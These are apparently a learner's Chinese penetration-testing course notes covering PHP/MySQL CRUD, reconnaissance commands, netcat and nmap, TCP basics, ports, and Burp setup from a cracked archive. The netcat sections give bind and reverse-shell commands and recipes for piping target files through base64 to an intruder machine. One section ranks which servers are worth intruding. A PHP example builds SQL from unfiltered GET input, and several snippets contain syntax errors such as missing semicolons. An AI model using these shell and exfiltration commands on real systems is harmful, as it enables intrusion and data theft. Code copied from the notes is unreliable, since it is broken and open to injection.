使用GET命令可以获取用户输入的信息并赋值给变量，例如：

<?php
$a = $_GET['name'];
echo $a;
?>

然后php可以通过地址(url)获取变量值，例如：

http://localhost/index.php?name=example

那如果有多个变量呢？

<?php
$a = $_GET['name'];
$b = $_GET['job'];
echo $a;
echo "你的工作是".$b;
?>

http://localhost/index.php?name=example&job=xxx即可

尤其注意： 在php文件后加上?变量名1=变量值1&变量名2=变量值2的格式

POST 命令

很简单，把上面的GET全改为POST就行了

<?php
$a = $_POST['name'];
echo $a;
?>

不过这时候需要我们手动去提交POST，像这样：

数据库交互之增删改查

登录phpmyadmin(http://localhost/phpmyadmin)创建一个示例数据库并随便写几条示例数据进去，过程略

连接数据库

<?php
// 1. 配置连接
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "test";		//数据库库名
// 2. 创建链接
$conn = new mysqli($servername,$username,$password,$dbname);

// 3. 检测连接
if($conn->connect_error){
    die("连接失败".$conn->connect_error);
}

?>

操作：查

<?php
// 1. 配置连接
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "test";		//数据库库名
// 2. 创建链接（使用mysqli函数按格式填写所需参数）
$conn = new mysqli($servername,$username,$password,$dbname);

// 3. 检测连接
if($conn->connect_error){
    die("连接失败".$conn->connect_error);
}
// 数据库查询语句================================================================

//准备一条数据库语句
$sql = "select * from db1 where id < 3"; // 这里相当于把查询指令赋值给$sql
// 执行sql语句并返回给变量
$result = $conn->query($sql);
// 判断result里是否有东西
if($result->num_rows>0){	// $result->num_rows获取结果集中的行数
  // 输出数据
  while($row = $result->fetch_assoc()){	// 每次从结果集中读取一行数据，并以关联数组形式返回
    echo $row['id'].'-----'.$row['uid'].'-----'.$row['job'].'<br/>';
  }
}else{
    echo "无结果";
}
$conn->close();	// 关闭数据库
?>

特别的，这里使用的sql语句格式为"select * from 数据表名 where 筛选条件"

操作：增

<?php
// 1. 配置连接
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "test";		//数据库库名
// 2. 创建链接（使用mysqli函数按格式填写所需参数）
$conn = new mysqli($servername,$username,$password,$dbname);

// 3. 检测连接
if($conn->connect_error){
    die("连接失败".$conn->connect_error);
}
// 数据库增语句==============================================================

//准备一条数据库语句
$sql = "insert into db1(uid,pwd,job) values('u5','666','driver')"; // 这里相当于把增加指令赋值给$sql

if($conn->query($sql)===true){
    echo "新纪录插入成功"
}else{
    echo "插入失败".$conn->error;
}
$conn->close();	// 关闭数据库
?>

特别的，这里使用的sql语句格式为:

"insert into 数据表名(关键字1,关键字2,关键字3) values('值1','值2','值3')"

操作：改

<?php
// 1. 配置连接
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "test";		//数据库库名
// 2. 创建链接（使用mysqli函数按格式填写所需参数）
$conn = new mysqli($servername,$username,$password,$dbname);

// 3. 检测连接
if($conn->connect_error){
    die("连接失败".$conn->connect_error);
}
// 数据库修改语句==============================================================

//准备一条数据库语句
$sql = "update db1 set pwd='mima' where uid='u2'";

if($conn->query($sql)===true){
    echo "修改成功"
}else{
    echo "修改失败".$conn->error;
}
$conn->close();	// 关闭数据库
?>

特别的，这里使用的sql语句格式为:

$sql = "update 数据表名 set 关键字1=值1 where 关键字2=值2"

此处关键字1是实际修改内容，关键字2是用来定位要修改的条目

操作：删

<?php
// 1. 配置连接
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "test";		//数据库库名
// 2. 创建链接（使用mysqli函数按格式填写所需参数）
$conn = new mysqli($servername,$username,$password,$dbname);

// 3. 检测连接
if($conn->connect_error){
    die("连接失败".$conn->connect_error);
}
// 数据库删除语句==============================================================

//准备一条数据库语句
$sql = "delete from db1 where uid=u4";

if($conn->query($sql)===true){
    echo "删除成功"
}else{
    echo "删除失败".$conn->error;
}
$conn->close();	// 关闭数据库
?>

特别的，这里使用的sql语句格式为:

$sql = "delete from 数据表名 where 关键字1=值1"

问题排查

数据库连接相关错误（最基础也最常见）

连接参数配置错误

触发方式：修改 $servername / $username / $password / $dbname 中的任意值，与数据库实际配置不匹配。

例：把 $dbname = "test" 改成 $dbname = "test123" （数据库不存在）；把 $password = "root" 改成 $password = "123456" （密码错误）。

问题表现：页面直接输出“连接失败”+ 具体错误信息（如 Unknown database ’test123’ 或 Access denied for user ‘root’@’localhost’ (using password: YES) ）。
问题根源：数据库连接的核心参数（地址、账号、密码、库名）必须与目标数据库完全一致，一旦 mismatch 就会连接失败。初学者常因“本地环境与服务器环境配置不同”“手误输错库名”踩坑。

未设置字符编码导致中文乱码

触发方式：数据库表/字段包含中文字符，且代码中未添加字符集设置。
问题表现：查询结果中的中文显示为 ??? 或乱码。
问题根源：MySQL 数据库默认字符集可能为 latin1 ，而 PHP 页面通常用 UTF-8 ，两者编码不匹配导致中文无法正常解析。代码中缺少字符集设置语句，是初学者最容易忽略的点。
如何触发：在数据库 db1 表的 job 字段中存入“程序员”“设计师”等中文字符，直接运行原代码，会发现中文乱码。

SQL 执行相关错误（隐性且易导致后续逻辑崩溃）

SQL 语法/表名/字段名错误，导致 query() 返回 false

触发方式：修改 SQL 语句中的关键字、表名或字段名，导致 SQL 语法无效。

例1：把select * from db1 where id < 4 改成 selec * from db1 where id < 4（ select 拼写错误）；

例2：把 db1 改成 db1_not_exist （表不存在）；

例3：把 id < 4 改成 id <（语法不完整）。

问题表现：页面报错 Trying to get property ’num_rows’ of non-object （试图访问非对象的 num_rows 属性）。
问题根源： $conn->query($sql) 执行失败时（SQL 语法错、表/字段不存在等），会返回 false （而非结果集对象）。原代码直接用 $result->num_rows ，相当于给 false 加 -> ，违反 PHP 语法（只有对象才能用 -> ）。

SQL 注入漏洞（安全层面的严重错误）

触发方式：将 SQL 中的硬编码条件（如 id < 4 ）改为拼接用户输入的变量。

例：把 $sql = "select * from db1 where id < 4" 改成：

1
2

$user_input = $_GET['id']; // 假设用户输入：4 or 1=1
$sql = "select * from db1 where id < $user_input";

问题表现：恶意用户可通过输入 4 or 1=1 等语句，查询表中所有数据（甚至修改/删除数据），导致数据泄露。
问题根源：原代码用“字符串拼接”方式构造 SQL（虽然当前是硬编码，无风险，但一旦接入用户输入就会触发注入），未使用 MySQLi 的预处理语句（参数化查询），无法过滤恶意输入。

结果处理相关错误（逻辑疏忽导致）

字段名与代码访问名不匹配

触发方式：修改 $row['id'] / $row['uid'] / $row['job'] 中的字段名，或修改数据库表的字段名。

例：数据库表中字段名是 uid 而非 uid ，但代码中仍写 $row[‘userid’] ；或把 $row[‘job’] 改成 $row[‘work’] 。

问题表现：页面输出空值（ ’’ ）或报错 Undefined index: uid （未定义索引 uid ）。
问题根源： fetch_assoc() 返回的关联数组，键名必须与数据库表的实际字段名完全一致（大小写敏感，取决于数据库配置），一旦拼写错误或字段名修改后未同步代码，就会出现索引不存在的错误。

循环中变量覆盖或未处理空结果集的边界情况

触发方式：在循环外定义了同名变量 $row ，或修改 num_rows 的判断逻辑。

例：在 while 循环前添加 $row = [‘id’ => 100]; ，会导致第一次循环覆盖初始值；或把 if($result->num_rows>0) 改成 if($result->num_rows) （看似等价，但如果 num_rows 为 0 时没问题，若 result 为 false 则报错，与前面 SQL 执行错误叠加）。

问题表现：数据输出异常（首行数据错误）或报错（如前面提到的非对象访问）。
问题根源：变量作用域未隔离（同名变量覆盖），或对 $result 的合法性判断不完整（只判断了行数，未判断 $result 是否为对象）。

php和html混写实现网页美化

<html>
<head>
    <title>测试网页</title>
<body>
<?php
// 1. 配置连接
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "test";		//数据库库名
// 2. 创建链接（使用mysqli函数按格式填写所需参数）
$conn = new mysqli($servername,$username,$password,$dbname);

// 3. 检测连接
if($conn->connect_error){
    die("连接失败".$conn->connect_error);
}
// 数据库查询语句
$userinput = $_GET['num'];
//准备一条数据库语句
$sql = "select * from db1 where id <= $userinput"; // 这里相当于把查询指令赋值给$sql
// 执行sql语句并返回给变量
$result = $conn->query($sql);
// 判断result里是否有东西
if($result->num_rows>0){	// $result->num_rows获取结果集中的行数
  // 输出数据====================================================================
  echo "<table border='1'>";
  echo "<tr><th>id</th> <th>uid</th> <th>job</th></tr>";
  while($row = $result->fetch_assoc()){	// 每次从结果集中读取一行数据，并以关联数组形式返回
      echo "<tr>";
      echo "<td>".$row['id']."</td>";
      echo "<td>".$row['uid']."</td>";
      echo "<td>".$row['job']."</td>";
      echo "</tr>";

  }
  echo "</table>";
}else{	//=======================================================================
    echo "无结果";
}
$conn->close();	// 关闭数据库
?>
</body>
</html>

分割线之间及代码头尾处有改动，分割线见主要实现了数据放置在表格中

命令行连接数据库

打开C:\phpstudy_pro\Extensions\MySQL5.7.26\bin

在此处启动CMD

下面是一些常用命令：

mysql -uroot -proot 登录数据库

show databases; 查看所有的库名

use xxx 使用(定位)xxx这个库名

show tables; 查看库中有什么表

select * from xxx 查看xxx这张表里的所有数据

此外所有php里的sql语句都可以在命令行之间使用

1.3 信息搜集工具的使用

Tue, 25 Nov 2025 10:56:43 +0800

信息搜集

本地信息搜集(Windows 命令)

whoami 查看自己身份

whoami /all 获取当前域的信息

ipconfig 获取ip地址信息

ipconfig /all 获取详细的ip地址信息

查询结果：[所在域-计算机名-账户名]

arp -a 查询arp表

echo %PROCESSOR_ARCHITECTURE% 查看CPU架构

systeminfo 查看操作系统信息

wmic product 查看安装的软件

wmic product get name,version 查看安装的软件和版本信息

net user 查看本地用户

net session 查看本地和远程的会话

net view 查看内网的共享情况

net share 查看自己共享了哪些东西

远程信息搜集(Kali 命令)

什么样的服务器有入侵价值？

有有价值的网站

seo.chinaz.com 查看seo信息，权重，ip访问量

上面有庞大数据库的服务器

mssql mysql oracle redis…

性能优秀的服务器

高性能CPU，显卡，硬盘

保有某些单位机密的服务器

nping --tcp -p 80 --flag syn 2 [目标ip]

测试对方端口是否开放

nc -nvz [目标ip] 1-65535

使用nc查看对方端口是否开放

netdiscover -i [网卡名称] -r 192.168.x.0/24

搜集内网用户的信息

arping [参数] [目标]

使用arp扫描

-i 指定网卡

-c 发包数量

-s 源mac

-S 源ip

nbtscan

使用 netbios 协议进行信息搜集（Windows之间使用）

通过计算机名解析对应ip

whatweb [网址]

初步分析网站结构

nc用法追加

文件传输（常规）

先启动发送

发送端：nc -l -p [端口号] <文件

接收端：nc [发送端ip] [端口号] >文件

先启动接收

接收端：nc -l -p [端口号] >文件

发送端：nc [发送端ip] [端口号] <文件

文本传输（加密）

目标机：

cat [目标文件] | base64 | nc -nv [入侵机ip] [端口号] -q 1

入侵机：

nc -l -p [端口号] >文件

文件传输（两台都是Linux且有一方没有nc）

目标机：

whois -h [入侵机ip] -p [端口号] cat [文件] | base64``

入侵机：

nc -l -v- p [端口号] | sed "s/ //g" | base64 -d

加密通信（两台都是Linux）

使用ncat

目标机：

ncat -c bash --all [入侵IP] -vnl [port] --ssl

入侵机：

ncats -nv [目标IP] [port] --ssl

1.2 kali基础知识和指令及几个小工具

Sun, 23 Nov 2025 22:19:56 +0800

知识和指令

基础知识

文件属性

示例：d r-x(A) r-x(B) r-x(C) 13 root(D) root(E) 0 Nov 3 11:22 1.txt

括号部分仅作讲解用，实际上不存在

A=所有者权限

B=所有者所在的组的权限

C=其他人权限

D=文件的所有人

E=D所在的组

类型：

d文件夹

-文件

l链接

权限：

r=read=4 w=write=2 x=execute=1

权限编号的计算使用加法，例如：

权限代码	编号
r-x	5
-rw	6
–r	4

修改文件权限：

chmod [权限编号] [目标文件] 修改文件权限

chmod [权限编号] -R [文件夹] 把文件夹和文件内所有东西都赋值为75

示例：chmod 755 1.txt

系统操作

防火墙

chkconfig iptables on/off 打开/关闭防火墙

apt命令

软件安装apt-get install xxx

基础指令：

系统指令：

系统相关

passwd 修改当前用户密码

ifconfig 查看ip

whoami 查看自己是谁（账户）

clear 清空当前终端

uname 查看操作系统

uname -a 查看详细版本号

文件相关

ls 查看当前目录所有文件和文件夹

ls -la 查看详细信息（文件属性）

mkdir 创建目录

cd 转到指定目录

touch 创建文件

cat 查看文件

chmod 修改文件权限

cp [被复制的文件] [复制到（包括文件名）] 复制文件

mv [被剪切的文件] [粘贴到（包括文件名）] 剪切文件（也可用于修改文件名）

rm [目标] 删除

rm -rf [目标] 全部强制删除

find [要在哪个地方查找] -name [查找的文件名] 查找文件

echo xxx 回响（单独使用是复读机）

echo xxx > 1.txt 创建名为1.txt的文件并写入xxx（有覆盖效果）

echo xxx >> 1.txt 向1.txt中追加xxx

查看进程

ps 查看进程

ps -ef 查看全部进程

ps -ef | grep xxx 查看进程名字包含xxx关键词的进程

top 查看进程（打开性能监视器）

软件指令：

编辑器类：

nano 用nano打开文件

vim 用vim打开文件

几个小工具

nc的使用

基础连接

服务端(被控)：

nc -l -p [端口号] 监听指定端口

客户端(控制)：

nc -nv [服务端ip] [端口号] 连接服务端

远程控制

正向控制

入侵者每次主动连接目标

目标(被控)：

nc -lp [端口号] -e cmd 指客户端连接后为其打开cmd

入侵：

nc -nv [服务端ip] [端口号] 连接目标

反向控制

目标每次自己连接入侵者

目标(被控)：

nc -nv [入侵者ip] [端口号] -e cmd

注意：如果目标系统为linux则将-e cmd改为-c bash

nmap的使用

nmap [可选参数] [目标ip] 普通扫描

参数：

-sT tcp扫描

-sS 隐秘扫描（不形成三次握手）

-sL [扫描一个ip段] 例如192.168.0.1/24 (指从192.168.0.1到192.168.0.255) 主要用于批量主机发现

-sn ping扫描，只发现主机，不扫描端口，通常结合-sL使用

-Pn 将所有主机假定开机，跳过主机发现的过程

-P0 使用ip协议探测主机是否开启

-sU 使用UDP扫描

-p 指定扫描那些端口，例如nmap -p 80,443,3380 192.168.1.0/24

-O 识别操作系统，例如nmap -O --osscan-guess 192.168.172.130

-A 强力模式，自动调用脚本获取最多信息，但也最慢

追加：网络相关

TCP的三次握手与四次挥手

TCP（Transmission Control Protocol，传输控制协议）是 面向连接、可靠的字节流协议，其核心机制 “三次握手”（建立连接）和 “四次挥手”（释放连接）是保障数据可靠传输的基础。

核心前提：TCP 报文关键字段

在理解握手 / 挥手前，需先掌握 TCP 报文中的 3 个核心标志位和 2 个序列号字段，这是通信的 “信号标识”：

字段	作用
SYN	同步标志（Synchronize）：用于发起连接，请求同步对方的序列号（`seq`）
ACK	确认标志（Acknowledgment）：用于确认收到数据，携带确认号（`ack`）
FIN	终止标志（Finish）：用于发起连接释放，告知对方 “我已无数据要发送”
seq（序列号）	标记当前发送数据的字节位置（随机初始化，后续按字节递增）
ack（确认号）	标记 “期望下次收到的对方序列号”（= 已收到的对方 seq + 1）

注：TCP 是全双工通信（双方可同时发送数据），因此每个方向都需要独立的序列号和确认机制。

三次握手（Three-Way Handshake）：建立可靠连接

核心目的：

双方确认彼此的 “发送能力” 和 “接收能力” 均正常；
协商初始序列号（seq），为后续数据传输的 “有序性” 和 “去重” 打下基础；
避免 “失效的连接请求报文段” 导致错误连接。

步骤拆解：

第一次握手（客户端→服务器）：
- 客户端发送报文：SYN=1（发起连接），seq=x（x 是客户端随机生成的初始序列号，如 1000）；
- 客户端状态变为 SYN_SENT（等待服务器确认）；
- 作用：告诉服务器 “我想和你建立连接，请你同步我的序列号”。
第二次握手（服务器→客户端）：
- 服务器收到 SYN 后，回复报文：SYN=1（同意建立连接，同步自己的序列号）+ ACK=1（确认收到客户端的 SYN）；
- 服务器序列号：seq=y（y 是服务器随机生成的初始序列号，如 2000）；
- 服务器确认号：ack=x+1（表示 “我已收到你到 x 的所有数据，下次请从 x+1 开始发”）；
- 服务器状态变为 SYN_RCVD（等待客户端最终确认）；
- 作用：服务器同时完成 “确认客户端接收 / 发送能力” 和 “发起自己的连接同步”。
第三次握手（客户端→服务器）：
- 客户端收到服务器的 SYN+ACK 后，回复报文：ACK=1（确认收到服务器的 SYN）；
- 客户端序列号：seq=x+1（按字节递增，因第一次仅发送了 SYN 标志位，无数据字节，故 + 1）；
- 客户端确认号：ack=y+1（表示 “我已收到你到 y 的所有数据，下次请从 y+1 开始发”）；
- 客户端状态变为 ESTABLISHED（连接建立），服务器收到后也变为 ESTABLISHED；
- 作用：客户端最终确认服务器的连接请求，双方完成 “双向能力验证” 和 “序列号协商”。

关键设计逻辑：为什么是 “三次” 而不是 “两次”？

两次握手的风险：若客户端发送的 “连接请求报文段” 因网络延迟未及时到达服务器，客户端会超时重发。若延迟的报文段后续到达服务器，服务器会误以为是新的连接请求，直接回复 SYN+ACK 并建立连接，但客户端此时已不需要该连接，会忽略服务器的回复，导致服务器资源被浪费（半连接状态）。
三次握手的必要性：第三次握手是客户端对服务器 SYN 的确认，确保 “服务器知道客户端已收到自己的连接响应”，从而避免上述资源浪费。只有三次握手，才能实现双方 “双向可靠确认”。

四次挥手（Four-Way Wavehand）：释放连接

核心目的

TCP 是全双工通信，双方可同时发送数据。释放连接时，需确保：

双方都已完成数据传输（无未发送 / 未接收的数据）；
双方都明确 “对方已停止发送数据”，避免提前关闭连接导致数据丢失。

步骤拆解：

第一次挥手（客户端→服务器）：
- 客户端完成数据发送后，发送报文：FIN=1（告知服务器 “我已无数据要发，请求关闭我的发送通道”）；
- 客户端序列号：seq=x+1（基于之前的数据传输进度，假设之前已发送到 x）；
- 客户端确认号：ack=y+1（确认之前收到的服务器数据）；
- 客户端状态变为 FIN_WAIT_1（等待服务器确认关闭）；
- 注意：客户端关闭的是 “发送通道”，仍可接收服务器的数据（全双工特性）。
第二次挥手（服务器→客户端）：
- 服务器收到 FIN 后，回复报文：ACK=1（确认收到客户端的关闭请求）；
- 服务器序列号：seq=y+1（基于之前的传输进度）；
- 服务器确认号：ack=x+2（因客户端发送了 FIN 标志位，相当于 1 个字节的 “关闭请求数据”，故 x+1+1=x+2）；
- 服务器状态变为 CLOSE_WAIT（等待自己的数据发送完成后，再关闭自己的发送通道）；
- 客户端收到后，状态变为 FIN_WAIT_2（等待服务器的 FIN 报文）；
- 作用：服务器确认 “客户端不再发送数据”，但自己可能仍有数据要发给客户端（如剩余的响应数据）。
第三次挥手（服务器→客户端）：
- 服务器完成所有数据发送后，发送报文：FIN=1（告知客户端 “我也无数据要发，请求关闭我的发送通道”）；
- 服务器序列号：seq=y+1（无新数据发送，序列号不变）；
- 服务器确认号：ack=x+2（与第二次挥手一致）；
- 服务器状态变为 LAST_ACK（等待客户端最终确认）；
- 作用：服务器关闭自己的发送通道，告知客户端 “可以彻底关闭连接了”。
第四次挥手（客户端→服务器）：
- 客户端收到服务器的 FIN 后，回复报文：ACK=1（确认收到服务器的关闭请求）；
- 客户端序列号：seq=x+2（基于之前的确认号）；
- 客户端确认号：ack=y+2（服务器的 FIN 相当于 1 个字节，故 y+1+1=y+2）；
- 客户端状态变为 TIME_WAIT（等待 2MSL 后关闭），服务器收到后状态变为 CLOSED；
- 客户端等待 2MSL（Maximum Segment Lifetime，报文最大生存时间，默认 2 分钟）后，状态变为 CLOSED；
- 作用：确保服务器能收到客户端的最终确认（避免服务器因报文丢失而重发 FIN）。

关键设计逻辑：为什么是 “四次” 而不是 “三次”？

核心原因：TCP 是全双工通信，双方的 “发送通道” 需要独立关闭。
第三次握手时，服务器可以同时发送 SYN 和 ACK（因为此时服务器还未发送数据，可合并报文）；
四次挥手时，服务器收到客户端的 FIN 后，可能仍有数据要发送，无法立即发送 FIN（需先完成数据传输），因此必须分两步：先回复 ACK（确认客户端关闭），再发送 FIN（自己关闭），导致比三次握手多一次报文交互。

关键细节：TIME_WAIT 状态的作用

目的 1：确保最后一个 ACK 报文能到达服务器（若服务器未收到 ACK，会重发 FIN，客户端在 TIME_WAIT 期间可重新回复）；
目的 2：避免 “失效的报文段” 干扰新连接（TIME_WAIT 期间，客户端会丢弃所有来自该连接的旧报文段）；
实际影响：服务器若频繁关闭连接，会积累大量 TIME_WAIT 状态的端口，导致端口耗尽（可通过调整net.ipv4.tcp_tw_reuse等内核参数优化）。

端口

端口是计算机网络中用于区分不同服务/应用的逻辑地址（范围：0-65535），按用途可分为 知名端口（0-1023）、注册端口（1024-49151） 和 动态端口（49152-65535）。以下是开发者和日常使用中最常见的端口及其核心特点，按场景分类整理，方便查阅：

核心网络服务端口（知名端口，0-1023）

这类端口由 IANA 分配，对应基础网络服务，默认端口固定，是网络通信的基础。

端口号	协议	服务/应用	核心特点	使用场景	安全注意事项
21	TCP	FTP（文件传输）	明文传输用户名/密码和文件数据，不加密；主动模式（服务器连客户端20端口）/被动模式	传统文件传输（已逐渐被替代）	风险极高！明文传输易被窃听，建议用 SFTP（22端口）或 FTPS 替代
22	TCP	SSH（安全外壳）	加密远程登录/命令执行，支持端口转发、文件传输（SFTP），替代Telnet	服务器远程管理（Linux/云服务器）	建议修改默认端口（如2222），禁用密码登录（仅用SSH密钥），限制登录IP
23	TCP	Telnet（远程登录）	明文传输，无加密，安全性极差	早期设备管理（已淘汰）	完全不推荐使用！用SSH（22端口）替代
25	TCP	SMTP（邮件发送）	用于邮件服务器之间发送邮件，或客户端向服务器提交邮件（需配合认证）	邮件服务（如Postfix、Sendmail）	默认无加密，建议开启TLS（465端口），配置SPF/DKIM防止邮件伪造
53	TCP/UDP	DNS（域名解析）	UDP用于普通查询（快，无连接）；TCP用于区域传输（数据量大，可靠）	域名解析（如访问网站、API）	开放公共DNS需注意防护DDoS攻击；内网建议部署本地DNS缓存（如Pi-hole）
80	TCP	HTTP（超文本传输）	明文传输网页数据，无加密，是Web服务默认端口	普通网站访问、HTTP API	仅用于测试/内部服务，公网必须升级为HTTPS（443端口），否则数据易被篡改窃听
443	TCP	HTTPS（加密HTTP）	基于TLS/SSL加密，保障数据传输安全，支持HTTP/2、HTTP/3	HTTPS网站、加密API、小程序	必须配置有效SSL证书（Let’s Encrypt免费），禁用弱加密套件（如TLS 1.0/1.1）
110	TCP	POP3（邮件接收）	明文接收邮件，无加密	客户端接收邮件（已淘汰）	用POP3S（995端口，加密）替代
143	TCP	IMAP（邮件接收）	支持邮件文件夹同步、标记管理，明文传输	客户端接收邮件（主流）	用IMAPS（993端口，加密）替代，开启邮件二次验证
389	TCP/UDP	LDAP（目录服务）	用于用户身份认证、组织架构管理（如企业内网）	企业内网身份验证	明文传输风险高，用LDAPS（636端口，加密）替代
445	TCP	SMB（文件共享）	Windows文件共享、打印机共享，支持跨设备访问	内网文件共享（Windows/Mac）	漏洞频发（如永恒之蓝），公网禁止开放；内网限制访问IP，关闭匿名登录

开发者常用端口（注册端口，1024-49151）

这类端口由应用程序注册使用，默认端口可配置修改，是开发、测试、部署中高频接触的端口。

数据库端口

端口号	协议	数据库/服务	核心特点	使用场景	安全注意事项
3306	TCP	MySQL/MariaDB	关系型数据库默认端口，支持主从复制、事务	Web开发、数据分析	公网禁止开放！内网绑定本地IP（127.0.0.1），设置强密码，限制访问IP
5432	TCP	PostgreSQL	开源关系型数据库，支持复杂查询、JSON数据	后端开发、大数据应用	同MySQL，禁用远程匿名访问，开启SSL加密
1433	TCP	SQL Server	微软SQL Server数据库默认端口	.NET开发、企业应用	公网不开放，内网限制IP，启用Windows认证或混合认证
27017	TCP	MongoDB	文档型数据库，无Schema，支持分布式存储	大数据、API后端、NoSQL应用	默认无认证！需启用访问控制（用户名密码），绑定内网IP，禁止公网暴露
6379	TCP	Redis	内存缓存数据库，高性能，支持多种数据结构	缓存、会话存储、消息队列	高危！默认无密码，需设置密码、绑定本地IP、开启防火墙，禁用公网访问
9200	TCP	Elasticsearch	全文搜索引擎，支持分布式、实时检索	日志分析、全文搜索功能	禁用匿名访问，配置用户认证（如X-Pack），限制访问IP

Web开发/服务器端口

端口号	协议	服务/框架	核心特点	使用场景	安全注意事项
8080	TCP	通用Web端口	开发环境默认端口（如Tomcat、Nginx反向代理），非特权端口	本地开发测试、内网Web服务	公网部署需映射到80/443，禁止直接暴露8080；开启认证（如Basic Auth）
8000	TCP	开发服务器	Python Flask/Django、Node.js默认开发端口	本地开发调试（如`python manage.py runserver`）	仅用于本地测试，切勿公网开放（无安全防护）
3000	TCP	Node.js/React	Node.js Express、React开发服务器默认端口	前端/Node.js后端开发	同8000，本地测试专用，公网需通过Nginx反向代理并配置HTTPS
4000	TCP	Hugo/Gatsby	Hugo开发服务器默认端口（`hugo server -p 4000`）	静态博客本地预览（如GitHub Pages博客）	仅本地使用，无需公网开放，预览后部署到GitHub Pages（80/443端口）
8096	TCP	Jellyfin	媒体服务器默认端口（Web管理界面+流媒体传输）	云/内网媒体库（如之前提到的Jellyfin）	公网访问需配置HTTPS（反向代理+SSL），设置强密码，限制登录IP
8888	TCP	Jupyter Notebook	Python交互式开发环境默认端口	数据分析、机器学习开发	本地使用需设置密码（`jupyter notebook password`），公网需端口转发+HTTPS

其他开发工具端口

端口号	协议	工具/服务	核心特点	使用场景	安全注意事项
5900	TCP	VNC（远程桌面）	跨平台远程桌面控制，支持图形界面	远程操作桌面（如树莓派）	默认无加密，需开启VNC加密（如TightVNC），设置强密码，限制访问IP
3389	TCP	RDP（Windows远程桌面）	Windows自带远程桌面，图形界面流畅	Windows服务器/电脑远程控制	公网禁止开放！内网限制IP，开启网络级别认证（NLA），设置复杂密码
6000-6005	TCP	X11（Linux图形界面）	Linux/Unix图形界面传输端口	Linux远程图形界面访问	明文传输，风险高，建议用SSH隧道转发（`ssh -X user@server`）替代
9090	TCP	Prometheus	监控系统默认端口（Web UI+API）	服务器/应用监控	公网需配置认证（如Basic Auth），限制访问IP，配合Grafana（3000端口）可视化

1.1 抓包和web基本知识

Mon, 17 Nov 2025 15:59:43 +0800

本篇课程使用资源库内的“win10渗透测试工具预安装虚拟机（日常使用）”

抓包

环境准备

Java环境准备

打开C:\tools\alltools\java环境中的jre-8u261-windows-x64.rar压缩包，解压并安装Java
安装完成后按win+R打开“运行”窗口，输入cmd并回车进入命令行控制台。
分别输入java和javac均有内容返回则说明安装成功。

Burpsuite软件的准备

打开C:\tools\alltools\抓包工具中的Burpsuitepro_Unlimited_jb51.rar压缩包并解压到合适的位置。
在解压的文件夹内创建一个.bat批处理文件用于启动Burpsuite，名称随便，内容为：

`1`	`java -jar BurpUnlimited.jar`

双击该批处理文件即可启动Burpsuite,一路next进入软件界面。
检查并确认Options选项卡中监听地址和端口为127.0.0.1:8080

Firefox浏览器的准备（需要开着Burpsuite）

打开Firefox浏览器，并转到选项中，在高级-网络-连接-设置中选择“手动配置代理”并勾选为所有协议使用相同代理，填写好之前获取的地址和端口。

在地址栏输入http://burp/能进入页面说明配置成功，接下来点击页面右上角的‘CA Certificate’按钮保存证书。
再次转到浏览器的选项中，在高级-证书-查看证书-证书机构-导入中选择刚才保存到证书导入，弹窗内全部勾上。
证书机构的列表中多出名为PortSwigger CA的证书则导入成功。

Charles软件的准备（可选）

打开位于C:\tools\Charles内的Charles.exe

点击代理选项，可以看到默认勾选了Windows代理，说明Charles默认使用系统代理的方法抓包，也因此能抓取系统上所有软件的http数据包。

正如上述，我们需要在浏览器的代理设置中更改为：**使用系统代理 **（1.1.3中提到）
因为未知原因，charles的证书不能从本地保存后导入，所以这里我们选择 **帮助-SSL代理-在移动设备或远程浏览器上安装Charles根证书 **点击后出现弹窗，例如：

这里我们只看后面的chls.pro/ssl在浏览器中访问该地址。

安装证书的操作不再过多叙述。

抓包实操

Burp抓包

在Burp软件内Proxy-Intercept选项卡中点击Intercept is off开始抓包

此时在百度上搜索任意关键词（以"test"为例）可以看到抓取到数据包

修改数据包首行wd参数值为"ok"

点击Intercept is on放行数据包

发现搜索关键词被替换为"ok"

Charles抓包

打开Charles软件并访问百度

发现抓取到数据包，查看内容发现与页面原代码一致

web基本知识

一些术语：

GET 通过地址栏输入===从服务器获取

POST 提交表单===向服务器发送

request 向服务器发起一个请求，服务器会返回一个结果(response)给客户端

**forward **服务器内部发送重定向（网页发生改变但地址不变）

**redirect **服务器收到一个请求后，发送一个状态给客户端，客户端会再次请求，此时url发生了改变

**url **统一资源定位器（链接）

url的组成，以百度搜索为例：

https:// www.baidu.com/ s ? wd=test & rsv_spt=1 & issp=1 & f=8

http:// == 协议

www.baidu.com == 域名

s == 文件

？== get请求

wd/rsv_spt/issp/f == 参数名

参数名等号后为参数值

& == 连接符